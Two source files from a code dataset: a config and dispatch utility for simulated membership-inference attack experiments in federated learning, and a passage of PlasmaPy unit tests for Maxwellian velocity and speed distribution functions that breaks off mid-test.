Python
|
demo/utils.py
|
The-MinGo/NISL_FL
|
a18ce2b3288b50e6fdd82a0f4bd48e7a61b34159
|
[
"Apache-2.0"
] | 6
|
2022-03-04T08:30:40.000Z
|
2022-03-07T13:45:32.000Z
|
demo/utils.py
|
The-MinGo/membership-inference-attack-in-federated-learning
|
a18ce2b3288b50e6fdd82a0f4bd48e7a61b34159
|
[
"Apache-2.0"
] | null | null | null |
demo/utils.py
|
The-MinGo/membership-inference-attack-in-federated-learning
|
a18ce2b3288b50e6fdd82a0f4bd48e7a61b34159
|
[
"Apache-2.0"
] | 2
|
2021-11-10T18:13:25.000Z
|
2022-01-21T08:11:20.000Z
|
import sys
def capture_cmdline(params):
    """Override the experiment config `params` from command-line arguments.

    Expects ``sys.argv[1:4]`` to be ``<model> <dataset> <attack_name>``; with no
    arguments `params` is returned unchanged. Mutates and returns `params`:
    copies the three names in, applies per-attack tweaks, and wires the chosen
    model's exploited layer/gradient indexes into the inference-model config.

    Raises:
        ValueError: if some but not all of the three arguments are given
            (previously this crashed with a bare IndexError).
    """
    if len(sys.argv) == 1:
        return params
    if len(sys.argv) < 4:
        raise ValueError(
            "expected three command-line arguments: <model> <dataset> <attack_name>"
        )
    model, dataset, attack_name = sys.argv[1:4]
    params["model"] = model
    params["dataset"] = dataset
    params["attack_name"] = attack_name
    if attack_name == "isolating_attack":
        # The isolated participant is the attack target.
        isolated_cid = params["target_participant"]["target_cid"]
        params["isolated_participant"]["isolated_cid"] = isolated_cid
    elif attack_name == "overfitting_attack":
        # Overfit the attacker by doubling its local training epochs.
        params["attacker_participant"]["local_epochs"] *= 2
    # Point the inference model at the chosen model's exploited layers/gradients.
    layer_indexes = params[model]["exploited_layer_indexes"]
    params["inference_model"]["exploited_layer_indexes"] = layer_indexes
    gradient_indexes = params[model]["exploited_gradient_indexes"]
    params["inference_model"]["exploited_gradient_indexes"] = gradient_indexes
    return params
def map_mia(attack_name, epoch, cid,
            server, client, attacker,
            params, logger):
    """Dispatch the membership-inference attack selected by `attack_name`.

    Unknown attack names are silently ignored (no-op), matching the original
    if/elif chain.
    """
    handlers = {
        "local_passive_attack": local_passive_attack,
        "overfitting_attack": overfitting_attack,
        "global_passive_attack": global_passive_attack,
        "isolating_attack": isolating_attack,
    }
    handler = handlers.get(attack_name)
    if handler is not None:
        handler(epoch, cid, server, client, attacker, params, logger)
def local_passive_attack(epoch, cid, server,
                         client, attacker, params, logger):
    """Run one federated-learning round for participant `cid`, mounting a local
    passive membership-inference attack when the target epoch/participant is hit.

    NOTE(review): `server`, `client`, `attacker`, `logger` are project objects;
    their exact contracts are assumed from the method names used below — confirm
    against their definitions.
    """
    # Unpack attack/participant configuration from the params dict.
    target_participant_config = params["target_participant"]
    target_cid = target_participant_config["target_cid"]
    target_fed_epoch = target_participant_config["target_fed_epoch"]
    attacker_participant_config = params["attacker_participant"]
    attacker_cid = attacker_participant_config["attacker_cid"]
    attacker_local_epochs = attacker_participant_config["local_epochs"]
    participant_config = params["participant"]
    batch_size = participant_config["batch_size"]
    client_local_epochs = participant_config["local_epochs"]
    # At the configured (epoch, cid) the attacker builds, trains, and evaluates
    # its membership-inference model against the victim client.
    if epoch == target_fed_epoch and cid == target_cid:
        print("train inference model on victim (cid): {} "
              "at federated learning epoch: {}".format(target_cid, (target_fed_epoch + 1)))
        logger.info("train inference model on victim (cid): {}, "
                    "federated training epoch: {}".format(target_cid, (target_fed_epoch + 1)))
        attacker.create_membership_inference_model(client)
        attacker.train_inference_model()
        attacker.test_inference_model(client)
    # Regular federated round: announce, pull global weights, train locally,
    # push local weights back for aggregation.
    print("[federated learning epoch: {}, "
          "current participant(cid): {}]".format((epoch + 1), cid))
    logger.info("federated training epoch: {}, "
                "current participant (cid): {}".format((epoch + 1), cid))
    client.download_global_parameters(server.global_parameters)
    # The attacker trains with its own epoch count; everyone else uses the default.
    if cid == attacker_cid:
        client.train_local_model(batch_size=batch_size,
                                 local_epochs=attacker_local_epochs)
    else:
        client.train_local_model(batch_size=batch_size,
                                 local_epochs=client_local_epochs)
    current_local_parameters = client.upload_local_parameters()
    server.accumulate_local_parameters(current_local_parameters)
def overfitting_attack(epoch, cid, server,
                       client, attacker, params, logger):
    """Run one federated round with the overfitting membership-inference attack.

    The executed steps are byte-for-byte identical to `local_passive_attack`
    (the overfitting effect comes from `capture_cmdline` doubling the attacker's
    "local_epochs" in `params`, not from this function), so delegate to it
    instead of duplicating ~30 lines of identical logic.
    """
    local_passive_attack(epoch, cid, server,
                         client, attacker, params, logger)
def global_passive_attack(epoch, cid, server,
                          client, attacker, params, logger):
    """Run one federated-learning round for participant `cid`, mounting a global
    passive membership-inference attack after local training at the target
    epoch/participant (unlike the local variant, the attack runs post-round).

    NOTE(review): `server`, `client`, `attacker`, `logger` are project objects;
    their exact contracts are assumed from the method names used below — confirm
    against their definitions.
    """
    # Unpack attack/participant configuration from the params dict.
    target_participant_config = params["target_participant"]
    target_cid = target_participant_config["target_cid"]
    target_fed_epoch = target_participant_config["target_fed_epoch"]
    attacker_participant_config = params["attacker_participant"]
    attacker_cid = attacker_participant_config["attacker_cid"]
    attacker_local_epochs = attacker_participant_config["local_epochs"]
    participant_config = params["participant"]
    batch_size = participant_config["batch_size"]
    client_local_epochs = participant_config["local_epochs"]
    # Regular federated round: announce, pull global weights, train locally,
    # push local weights back for aggregation.
    print("[federated learning epoch: {}, current participant (cid): {}]".format((epoch + 1), cid))
    logger.info("federated training epoch: {}, "
                "current participant (cid): {}".format((epoch + 1), cid))
    client.download_global_parameters(server.global_parameters)
    # The attacker trains with its own epoch count; everyone else uses the default.
    if cid == attacker_cid:
        client.train_local_model(batch_size=batch_size, local_epochs=attacker_local_epochs)
    else:
        client.train_local_model(batch_size=batch_size, local_epochs=client_local_epochs)
    current_local_parameters = client.upload_local_parameters()
    server.accumulate_local_parameters(current_local_parameters)
    # After the round, at the configured (epoch, cid), the attacker builds,
    # trains, and evaluates its membership-inference model against the victim.
    if epoch == target_fed_epoch and cid == target_cid:
        print("train inference model on victim (cid): {} "
              "at federated learning epoch: {}".format(target_cid, (target_fed_epoch + 1)))
        logger.info("train inference model on victim (cid): {}, "
                    "federated training epoch: {}".format(target_cid, (target_fed_epoch + 1)))
        attacker.create_membership_inference_model(client)
        attacker.train_inference_model()
        attacker.test_inference_model(client)
def isolating_attack(epoch, cid, server,
                     client, attacker, params, logger):
    """Run one federated round with the isolating membership-inference attack.

    The executed steps are byte-for-byte identical to `global_passive_attack`
    (the isolation itself is configured by `capture_cmdline`, which sets
    params["isolated_participant"]["isolated_cid"], not by this function), so
    delegate to it instead of duplicating ~25 lines of identical logic.
    """
    global_passive_attack(epoch, cid, server,
                          client, attacker, params, logger)
| 43.760976
| 99
| 0.694906
| 993
| 8,971
| 5.92145
| 0.064451
| 0.104082
| 0.047619
| 0.036735
| 0.911224
| 0.885374
| 0.885374
| 0.878571
| 0.878571
| 0.863946
| 0
| 0.00294
| 0.203879
| 8,971
| 204
| 100
| 43.97549
| 0.820358
| 0
| 0
| 0.802548
| 0
| 0
| 0.210679
| 0.013265
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038217
| false
| 0.038217
| 0.006369
| 0
| 0.057325
| 0.050955
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6a2282b871273300c11b9705b7491f72e61d4be8
| 46,585
|
py
|
Python
|
plasmapy/formulary/tests/test_distribution.py
|
sandshrew118/PlasmaPy
|
6053bd4f6ca36491b9d03fd1ab203f2fcb1bf33d
|
[
"BSD-2-Clause",
"MIT",
"BSD-2-Clause-Patent",
"BSD-1-Clause",
"BSD-3-Clause"
] | null | null | null |
plasmapy/formulary/tests/test_distribution.py
|
sandshrew118/PlasmaPy
|
6053bd4f6ca36491b9d03fd1ab203f2fcb1bf33d
|
[
"BSD-2-Clause",
"MIT",
"BSD-2-Clause-Patent",
"BSD-1-Clause",
"BSD-3-Clause"
] | 8
|
2018-08-15T06:38:32.000Z
|
2021-12-17T07:11:05.000Z
|
plasmapy/formulary/tests/test_distribution.py
|
sandshrew118/PlasmaPy
|
6053bd4f6ca36491b9d03fd1ab203f2fcb1bf33d
|
[
"BSD-2-Clause",
"MIT",
"BSD-2-Clause-Patent",
"BSD-1-Clause",
"BSD-3-Clause"
] | 3
|
2017-07-19T07:28:21.000Z
|
2020-06-24T18:34:07.000Z
|
"""Tests for functions that uses Distribution functions."""
import numpy as np
import pytest
import scipy.integrate as spint
from astropy import units as u
from astropy.constants import c, e, eps0, k_B, m_e, m_p, mu0
from ..distribution import (
kappa_velocity_1D,
kappa_velocity_3D,
Maxwellian_1D,
Maxwellian_speed_1D,
Maxwellian_speed_2D,
Maxwellian_speed_3D,
Maxwellian_velocity_2D,
Maxwellian_velocity_3D,
)
from ..parameters import kappa_thermal_speed, thermal_speed
class Test_Maxwellian_1D(object):
    """Tests for the Maxwellian_1D distribution function."""

    @classmethod
    def setup_class(self):
        """initializing parameters for tests"""
        self.T_e = 30000 * u.K
        self.v = 1e5 * u.m / u.s
        self.v_drift = 1000000 * u.m / u.s
        self.v_drift2 = 0 * u.m / u.s
        self.v_drift3 = 1e5 * u.m / u.s
        self.start = -5000
        self.stop = -self.start
        self.dv = 10000 * u.m / u.s
        self.v_vect = np.arange(self.start, self.stop, dtype="float64") * self.dv
        self.particle = "e"
        self.vTh = thermal_speed(
            self.T_e, particle=self.particle, method="most_probable"
        )
        self.distFuncTrue = 5.851627151617136e-07

    def test_max_noDrift(self):
        """
        Checks maximum value of distribution function is in expected place,
        when there is no drift applied.
        """
        max_index = Maxwellian_1D(
            self.v_vect, T=self.T_e, particle=self.particle, v_drift=0 * u.m / u.s
        ).argmax()
        assert np.isclose(self.v_vect[max_index].value, 0.0)

    def test_max_drift(self):
        """
        Checks maximum value of distribution function is in expected place,
        when there is drift applied.
        """
        max_index = Maxwellian_1D(
            self.v_vect, T=self.T_e, particle=self.particle, v_drift=self.v_drift
        ).argmax()
        assert np.isclose(self.v_vect[max_index].value, self.v_drift.value)

    def test_norm(self):
        """
        Tests whether distribution function is normalized, and integrates to 1.
        """
        # converting vTh to unitless
        vTh = self.vTh.si.value
        # setting up integration from -10*vTh to 10*vTh, which is close to Inf
        infApprox = 10 * vTh
        # integrating, this should be close to 1
        integ = spint.quad(
            Maxwellian_1D,
            -infApprox,
            infApprox,
            args=(self.T_e, self.particle, 0, vTh, "unitless"),
            epsabs=1e0,
            epsrel=1e0,
        )
        # value returned from quad is (integral, error), we just need
        # the 1st
        integVal = integ[0]
        # FIX: message was a plain string, so {integVal} was never interpolated
        exceptStr = f"Integral of distribution function should be 1 and not {integVal}."
        assert np.isclose(integVal, 1, rtol=1e-3, atol=0.0), exceptStr

    def test_std(self):
        """
        Tests that the standard deviation of the distribution recovers T_e.
        """
        std = (
            Maxwellian_1D(self.v_vect, T=self.T_e, particle=self.particle)
            * self.v_vect ** 2
            * self.dv
        ).sum()
        std = np.sqrt(std)
        T_distri = (std ** 2 / k_B * m_e).to(u.K)
        assert np.isclose(T_distri.value, self.T_e.value)

    def test_units_no_vTh(self):
        """
        Tests distribution function with units, but not passing vTh.
        """
        distFunc = Maxwellian_1D(
            v=self.v, T=self.T_e, particle=self.particle, units="units"
        )
        errStr = (
            f"Distribution function should be {self.distFuncTrue} "
            f"and not {distFunc}."
        )
        assert np.isclose(
            distFunc.value, self.distFuncTrue, rtol=1e-5, atol=0.0
        ), errStr

    def test_units_vTh(self):
        """
        Tests distribution function with units and passing vTh.
        """
        distFunc = Maxwellian_1D(
            v=self.v, T=self.T_e, vTh=self.vTh, particle=self.particle, units="units"
        )
        errStr = (
            f"Distribution function should be {self.distFuncTrue} "
            f"and not {distFunc}."
        )
        assert np.isclose(
            distFunc.value, self.distFuncTrue, rtol=1e-5, atol=0.0
        ), errStr

    def test_unitless_no_vTh(self):
        """
        Tests distribution function without units, and not passing vTh.
        """
        # converting T to SI then stripping units
        T_e = self.T_e.to(u.K, equivalencies=u.temperature_energy())
        T_e = T_e.si.value
        distFunc = Maxwellian_1D(
            v=self.v.si.value, T=T_e, particle=self.particle, units="unitless"
        )
        errStr = (
            f"Distribution function should be {self.distFuncTrue} "
            f"and not {distFunc}."
        )
        assert np.isclose(distFunc, self.distFuncTrue, rtol=1e-5, atol=0.0), errStr

    def test_unitless_vTh(self):
        """
        Tests distribution function without units, and with passing vTh.
        """
        # converting T to SI then stripping units
        T_e = self.T_e.to(u.K, equivalencies=u.temperature_energy())
        T_e = T_e.si.value
        distFunc = Maxwellian_1D(
            v=self.v.si.value,
            T=T_e,
            vTh=self.vTh.si.value,
            particle=self.particle,
            units="unitless",
        )
        errStr = (
            f"Distribution function should be {self.distFuncTrue} "
            f"and not {distFunc}."
        )
        assert np.isclose(distFunc, self.distFuncTrue, rtol=1e-5, atol=0.0), errStr

    def test_zero_drift_units(self):
        """
        Testing inputting drift equal to 0 with units. These should just
        get passed and not have extra units applied to them.
        """
        distFunc = Maxwellian_1D(
            v=self.v,
            T=self.T_e,
            particle=self.particle,
            v_drift=self.v_drift2,
            units="units",
        )
        errStr = (
            f"Distribution function should be {self.distFuncTrue} "
            f"and not {distFunc}."
        )
        assert np.isclose(
            distFunc.value, self.distFuncTrue, rtol=1e-5, atol=0.0
        ), errStr

    def test_value_drift_units(self):
        """
        Testing vdrifts with values
        """
        testVal = ((self.vTh ** 2 * np.pi) ** (-1 / 2)).si.value
        distFunc = Maxwellian_1D(
            v=self.v,
            T=self.T_e,
            particle=self.particle,
            v_drift=self.v_drift3,
            units="units",
        )
        errStr = f"Distribution function should be {testVal} and not {distFunc}."
        assert np.isclose(distFunc.value, testVal, rtol=1e-5, atol=0.0), errStr
class Test_Maxwellian_speed_1D(object):
    """Tests for the Maxwellian_speed_1D distribution function."""

    @classmethod
    def setup_class(self):
        """initializing parameters for tests"""
        self.T = 1.0 * u.eV
        self.particle = "H+"
        # get thermal velocity and thermal velocity squared
        self.vTh = thermal_speed(self.T, particle=self.particle, method="most_probable")
        self.v = 1e5 * u.m / u.s
        self.v_drift = 0 * u.m / u.s
        self.v_drift2 = 1e5 * u.m / u.s
        self.distFuncTrue = 1.72940389716217e-27
        self.distFuncDrift = 2 * (self.vTh ** 2 * np.pi) ** (-1 / 2)

    def test_norm(self):
        """
        Tests whether distribution function is normalized, and integrates to 1.
        """
        # setting up integration from 0 to 10*vTh
        xData1D = np.arange(0, 10.01, 0.01) * self.vTh
        yData1D = Maxwellian_speed_1D(v=xData1D, T=self.T, particle=self.particle)
        # integrating, this should be close to 1
        integ = spint.trapz(y=yData1D, x=xData1D)
        exceptStr = "Integral of distribution function should be 1."
        assert np.isclose(integ.value, 1), exceptStr

    def test_units_no_vTh(self):
        """
        Tests distribution function with units, but not passing vTh.
        """
        distFunc = Maxwellian_speed_1D(
            v=self.v, T=self.T, particle=self.particle, units="units"
        )
        errStr = (
            f"Distribution function should be {self.distFuncTrue} "
            f"and not {distFunc}."
        )
        assert np.isclose(
            distFunc.value, self.distFuncTrue, rtol=1e-5, atol=0.0
        ), errStr

    def test_units_vTh(self):
        """
        Tests distribution function with units and passing vTh.
        """
        distFunc = Maxwellian_speed_1D(
            v=self.v, T=self.T, vTh=self.vTh, particle=self.particle, units="units"
        )
        errStr = (
            f"Distribution function should be {self.distFuncTrue} "
            f"and not {distFunc}."
        )
        assert np.isclose(
            distFunc.value, self.distFuncTrue, rtol=1e-5, atol=0.0
        ), errStr

    def test_unitless_no_vTh(self):
        """
        Tests distribution function without units, and not passing vTh.
        """
        # converting T to SI then stripping units
        T = self.T.to(u.K, equivalencies=u.temperature_energy())
        T = T.si.value
        distFunc = Maxwellian_speed_1D(
            v=self.v.si.value, T=T, particle=self.particle, units="unitless"
        )
        errStr = (
            f"Distribution function should be {self.distFuncTrue} "
            f"and not {distFunc}."
        )
        assert np.isclose(distFunc, self.distFuncTrue, rtol=1e-5, atol=0.0), errStr

    def test_unitless_vTh(self):
        """
        Tests distribution function without units, and with passing vTh.
        """
        # converting T to SI then stripping units
        T = self.T.to(u.K, equivalencies=u.temperature_energy())
        T = T.si.value
        distFunc = Maxwellian_speed_1D(
            v=self.v.si.value,
            T=T,
            vTh=self.vTh.si.value,
            particle=self.particle,
            units="unitless",
        )
        errStr = (
            f"Distribution function should be {self.distFuncTrue} "
            f"and not {distFunc}."
        )
        assert np.isclose(distFunc, self.distFuncTrue, rtol=1e-5, atol=0.0), errStr

    def test_zero_drift_units(self):
        """
        Testing inputting drift equal to 0 with units. These should just
        get passed and not have extra units applied to them.
        """
        distFunc = Maxwellian_speed_1D(
            v=self.v,
            T=self.T,
            particle=self.particle,
            v_drift=self.v_drift,
            units="units",
        )
        errStr = (
            f"Distribution function should be {self.distFuncTrue} "
            f"and not {distFunc}."
        )
        assert np.isclose(
            distFunc.value, self.distFuncTrue, rtol=1e-5, atol=0.0
        ), errStr

    def test_value_drift_units(self):
        """
        Testing vdrifts with values
        """
        distFunc = Maxwellian_speed_1D(
            v=self.v,
            T=self.T,
            particle=self.particle,
            v_drift=self.v_drift2,
            units="units",
        )
        # FIX: the message claimed the expected value was 0.0, but the
        # assertion compares against self.distFuncDrift.
        errStr = (
            f"Distribution function should be {self.distFuncDrift} "
            f"and not {distFunc}."
        )
        assert np.isclose(
            distFunc.value, self.distFuncDrift.value, rtol=1e-5, atol=0.0
        ), errStr
class Test_Maxwellian_velocity_2D(object):
    """Tests for the Maxwellian_velocity_2D distribution function."""

    @classmethod
    def setup_class(self):
        """initializing parameters for tests"""
        self.T = 1.0 * u.eV
        self.particle = "H+"
        # get thermal velocity and thermal velocity squared
        self.vTh = thermal_speed(self.T, particle=self.particle, method="most_probable")
        self.vx = 1e5 * u.m / u.s
        self.vy = 1e5 * u.m / u.s
        self.vx_drift = 0 * u.m / u.s
        self.vy_drift = 0 * u.m / u.s
        self.vx_drift2 = 1e5 * u.m / u.s
        self.vy_drift2 = 1e5 * u.m / u.s
        self.distFuncTrue = 7.477094598799251e-55

    def test_norm(self):
        """
        Tests whether distribution function is normalized, and integrates to 1.
        """
        # converting vTh to unitless
        vTh = self.vTh.si.value
        # setting up integration from -10*vTh to 10*vTh, which is close to Inf
        infApprox = 10 * vTh
        # integrating, this should be close to 1
        integ = spint.dblquad(
            Maxwellian_velocity_2D,
            -infApprox,
            infApprox,
            lambda y: -infApprox,
            lambda y: infApprox,
            args=(self.T, self.particle, 0, 0, vTh, "unitless"),
            epsabs=1e0,
            epsrel=1e0,
        )
        # value returned from dblquad is (integral, error), we just need
        # the 1st
        integVal = integ[0]
        # FIX: message was a plain string, so {integVal} was never interpolated
        exceptStr = f"Integral of distribution function should be 1 and not {integVal}."
        assert np.isclose(integVal, 1, rtol=1e-3, atol=0.0), exceptStr

    def test_units_no_vTh(self):
        """
        Tests distribution function with units, but not passing vTh.
        """
        distFunc = Maxwellian_velocity_2D(
            vx=self.vx, vy=self.vy, T=self.T, particle=self.particle, units="units"
        )
        errStr = (
            f"Distribution function should be {self.distFuncTrue} "
            f"and not {distFunc}."
        )
        assert np.isclose(
            distFunc.value, self.distFuncTrue, rtol=1e-5, atol=0.0
        ), errStr

    def test_units_vTh(self):
        """
        Tests distribution function with units and passing vTh.
        """
        distFunc = Maxwellian_velocity_2D(
            vx=self.vx,
            vy=self.vy,
            T=self.T,
            vTh=self.vTh,
            particle=self.particle,
            units="units",
        )
        errStr = (
            f"Distribution function should be {self.distFuncTrue} "
            f"and not {distFunc}."
        )
        assert np.isclose(
            distFunc.value, self.distFuncTrue, rtol=1e-5, atol=0.0
        ), errStr

    def test_unitless_no_vTh(self):
        """
        Tests distribution function without units, and not passing vTh.
        """
        # converting T to SI then stripping units
        T = self.T.to(u.K, equivalencies=u.temperature_energy())
        T = T.si.value
        distFunc = Maxwellian_velocity_2D(
            vx=self.vx.si.value,
            vy=self.vy.si.value,
            T=T,
            particle=self.particle,
            units="unitless",
        )
        errStr = (
            f"Distribution function should be {self.distFuncTrue} "
            f"and not {distFunc}."
        )
        assert np.isclose(distFunc, self.distFuncTrue, rtol=1e-5, atol=0.0), errStr

    def test_unitless_vTh(self):
        """
        Tests distribution function without units, and with passing vTh.
        """
        # converting T to SI then stripping units
        T = self.T.to(u.K, equivalencies=u.temperature_energy())
        T = T.si.value
        distFunc = Maxwellian_velocity_2D(
            vx=self.vx.si.value,
            vy=self.vy.si.value,
            T=T,
            vTh=self.vTh.si.value,
            particle=self.particle,
            units="unitless",
        )
        errStr = (
            f"Distribution function should be {self.distFuncTrue} "
            f"and not {distFunc}."
        )
        assert np.isclose(distFunc, self.distFuncTrue, rtol=1e-5, atol=0.0), errStr

    def test_zero_drift_units(self):
        """
        Testing inputting drift equal to 0 with units. These should just
        get passed and not have extra units applied to them.
        """
        distFunc = Maxwellian_velocity_2D(
            vx=self.vx,
            vy=self.vy,
            T=self.T,
            particle=self.particle,
            vx_drift=self.vx_drift,
            vy_drift=self.vy_drift,
            units="units",
        )
        errStr = (
            f"Distribution function should be {self.distFuncTrue} "
            f"and not {distFunc}."
        )
        assert np.isclose(
            distFunc.value, self.distFuncTrue, rtol=1e-5, atol=0.0
        ), errStr

    def test_value_drift_units(self):
        """
        Testing vdrifts with values
        """
        testVal = ((self.vTh ** 2 * np.pi) ** (-1)).si.value
        distFunc = Maxwellian_velocity_2D(
            vx=self.vx,
            vy=self.vy,
            T=self.T,
            particle=self.particle,
            vx_drift=self.vx_drift2,
            vy_drift=self.vy_drift2,
            units="units",
        )
        errStr = f"Distribution function should be {testVal} and not {distFunc}."
        assert np.isclose(distFunc.value, testVal, rtol=1e-5, atol=0.0), errStr
@pytest.mark.slow
class Test_Maxwellian_speed_2D(object):
@classmethod
def setup_class(self):
"""initializing parameters for tests"""
self.T = 1.0 * u.eV
self.particle = "H+"
# get thermal velocity and thermal velocity squared
self.vTh = thermal_speed(self.T, particle=self.particle, method="most_probable")
self.v = 1e5 * u.m / u.s
self.v_drift = 0 * u.m / u.s
self.v_drift2 = 1e5 * u.m / u.s
self.distFuncTrue = 2.2148166449365907e-26
def test_norm(self):
"""
Tests whether distribution function is normalized, and integrates to 1.
"""
# setting up integration from 0 to 10*vTh
xData1D = np.arange(0, 10.001, 0.001) * self.vTh
yData1D = Maxwellian_speed_2D(v=xData1D, T=self.T, particle=self.particle)
# integrating, this should be close to 1
integ = spint.trapz(y=yData1D, x=xData1D)
exceptStr = "Integral of distribution function should be 1."
assert np.isclose(integ.value, 1), exceptStr
def test_units_no_vTh(self):
"""
Tests distribution function with units, but not passing vTh.
"""
distFunc = Maxwellian_speed_2D(
v=self.v, T=self.T, particle=self.particle, units="units"
)
errStr = (
f"Distribution function should be {self.distFuncTrue} "
f"and not {distFunc}."
)
assert np.isclose(
distFunc.value, self.distFuncTrue, rtol=1e-5, atol=0.0
), errStr
def test_units_vTh(self):
"""
Tests distribution function with units and passing vTh.
"""
distFunc = Maxwellian_speed_2D(
v=self.v, T=self.T, vTh=self.vTh, particle=self.particle, units="units"
)
errStr = (
f"Distribution function should be {self.distFuncTrue} "
f"and not {distFunc}."
)
assert np.isclose(
distFunc.value, self.distFuncTrue, rtol=1e-5, atol=0.0
), errStr
def test_unitless_no_vTh(self):
"""
Tests distribution function without units, and not passing vTh.
"""
# converting T to SI then stripping units
T = self.T.to(u.K, equivalencies=u.temperature_energy())
T = T.si.value
distFunc = Maxwellian_speed_2D(
v=self.v.si.value, T=T, particle=self.particle, units="unitless"
)
errStr = (
f"Distribution function should be {self.distFuncTrue} "
f"and not {distFunc}."
)
assert np.isclose(distFunc, self.distFuncTrue, rtol=1e-5, atol=0.0), errStr
def test_unitless_vTh(self):
    """Evaluate in unitless mode with an explicitly supplied vTh."""
    # Convert the temperature to kelvin, then strip the units.
    T_K = self.T.to(u.K, equivalencies=u.temperature_energy()).si.value
    result = Maxwellian_speed_2D(
        v=self.v.si.value,
        T=T_K,
        vTh=self.vTh.si.value,
        particle=self.particle,
        units="unitless",
    )
    failMsg = (
        f"Distribution function should be {self.distFuncTrue} "
        f"and not {result}."
    )
    assert np.isclose(result, self.distFuncTrue, rtol=1e-5, atol=0.0), failMsg
def test_zero_drift_units(self):
    """A drift of exactly 0 (with units) must pass straight through and
    leave the result identical to the no-drift case."""
    result = Maxwellian_speed_2D(
        v=self.v,
        T=self.T,
        particle=self.particle,
        v_drift=self.v_drift,
        units="units",
    )
    failMsg = (
        f"Distribution function should be {self.distFuncTrue} "
        f"and not {result}."
    )
    assert np.isclose(result.value, self.distFuncTrue, rtol=1e-5, atol=0.0), failMsg
def test_value_drift_units(self):
    """A non-zero drift is not implemented for the 2D speed distribution,
    so a NotImplementedError is expected."""
    with pytest.raises(NotImplementedError):
        Maxwellian_speed_2D(
            v=self.v,
            T=self.T,
            particle=self.particle,
            v_drift=self.v_drift2,
            units="units",
        )
@pytest.mark.slow
class Test_Maxwellian_velocity_3D(object):
    """Tests for the 3D Maxwellian velocity distribution function."""

    @classmethod
    def setup_class(cls):
        """Initialize parameters shared by all tests."""
        cls.T = 1.0 * u.eV
        cls.particle = "H+"
        # get thermal velocity and thermal velocity squared
        cls.vTh = thermal_speed(cls.T, particle=cls.particle, method="most_probable")
        cls.vx = 1e5 * u.m / u.s
        cls.vy = 1e5 * u.m / u.s
        cls.vz = 1e5 * u.m / u.s
        cls.vx_drift = 0 * u.m / u.s
        cls.vy_drift = 0 * u.m / u.s
        cls.vz_drift = 0 * u.m / u.s
        cls.vx_drift2 = 1e5 * u.m / u.s
        cls.vy_drift2 = 1e5 * u.m / u.s
        cls.vz_drift2 = 1e5 * u.m / u.s
        # expected value of the distribution at (vx, vy, vz)
        cls.distFuncTrue = 6.465458269306909e-82

    def test_norm(self):
        """
        Tests whether distribution function is normalized, and integrates to 1.
        """
        # converting vTh to unitless
        vTh = self.vTh.si.value
        # setting up integration from -10*vTh to 10*vTh, which is close to Inf
        infApprox = 10 * vTh
        # integrating, this should be close to 1
        integ = spint.tplquad(
            Maxwellian_velocity_3D,
            -infApprox,
            infApprox,
            lambda z: -infApprox,
            lambda z: infApprox,
            lambda z, y: -infApprox,
            lambda z, y: infApprox,
            args=(self.T, self.particle, 0, 0, 0, vTh, "unitless"),
            epsabs=1e0,
            epsrel=1e0,
        )
        # value returned from tplquad is (integral, error), we just need
        # the 1st
        integVal = integ[0]
        # Fix: this was a plain string, so {integVal} was never interpolated;
        # it must be an f-string for the failure message to be useful.
        exceptStr = (
            f"Integral of distribution function should be 1 and not {integVal}."
        )
        assert np.isclose(integVal, 1, rtol=1e-3, atol=0.0), exceptStr

    def test_units_no_vTh(self):
        """
        Tests distribution function with units, but not passing vTh.
        """
        distFunc = Maxwellian_velocity_3D(
            vx=self.vx,
            vy=self.vy,
            vz=self.vz,
            T=self.T,
            particle=self.particle,
            units="units",
        )
        errStr = (
            f"Distribution function should be {self.distFuncTrue} "
            f"and not {distFunc}."
        )
        assert np.isclose(
            distFunc.value, self.distFuncTrue, rtol=1e-5, atol=0.0
        ), errStr

    def test_units_vTh(self):
        """
        Tests distribution function with units and passing vTh.
        """
        distFunc = Maxwellian_velocity_3D(
            vx=self.vx,
            vy=self.vy,
            vz=self.vz,
            T=self.T,
            vTh=self.vTh,
            particle=self.particle,
            units="units",
        )
        errStr = (
            f"Distribution function should be {self.distFuncTrue} "
            f"and not {distFunc}."
        )
        assert np.isclose(
            distFunc.value, self.distFuncTrue, rtol=1e-5, atol=0.0
        ), errStr

    def test_unitless_no_vTh(self):
        """
        Tests distribution function without units, and not passing vTh.
        """
        # converting T to SI then stripping units
        T = self.T.to(u.K, equivalencies=u.temperature_energy())
        T = T.si.value
        distFunc = Maxwellian_velocity_3D(
            vx=self.vx.si.value,
            vy=self.vy.si.value,
            vz=self.vz.si.value,
            T=T,
            particle=self.particle,
            units="unitless",
        )
        errStr = (
            f"Distribution function should be {self.distFuncTrue} "
            f"and not {distFunc}."
        )
        assert np.isclose(distFunc, self.distFuncTrue, rtol=1e-5, atol=0.0), errStr

    def test_unitless_vTh(self):
        """
        Tests distribution function without units, and with passing vTh.
        """
        # converting T to SI then stripping units
        T = self.T.to(u.K, equivalencies=u.temperature_energy())
        T = T.si.value
        distFunc = Maxwellian_velocity_3D(
            vx=self.vx.si.value,
            vy=self.vy.si.value,
            vz=self.vz.si.value,
            T=T,
            vTh=self.vTh.si.value,
            particle=self.particle,
            units="unitless",
        )
        errStr = (
            f"Distribution function should be {self.distFuncTrue} "
            f"and not {distFunc}."
        )
        assert np.isclose(distFunc, self.distFuncTrue, rtol=1e-5, atol=0.0), errStr

    def test_zero_drift_units(self):
        """
        Testing inputting drift equal to 0 with units. These should just
        get passed and not have extra units applied to them.
        """
        distFunc = Maxwellian_velocity_3D(
            vx=self.vx,
            vy=self.vy,
            vz=self.vz,
            T=self.T,
            particle=self.particle,
            vx_drift=self.vx_drift,
            vy_drift=self.vy_drift,
            vz_drift=self.vz_drift,
            units="units",
        )
        errStr = (
            f"Distribution function should be {self.distFuncTrue} "
            f"and not {distFunc}."
        )
        assert np.isclose(
            distFunc.value, self.distFuncTrue, rtol=1e-5, atol=0.0
        ), errStr

    def test_value_drift_units(self):
        """
        Testing vdrifts with values
        """
        # with v == v_drift, the exponential is 1 and only the normalization
        # prefactor (vTh^2 * pi)^(-3/2) remains
        testVal = ((self.vTh ** 2 * np.pi) ** (-3 / 2)).si.value
        distFunc = Maxwellian_velocity_3D(
            vx=self.vx,
            vy=self.vy,
            vz=self.vz,
            T=self.T,
            particle=self.particle,
            vx_drift=self.vx_drift2,
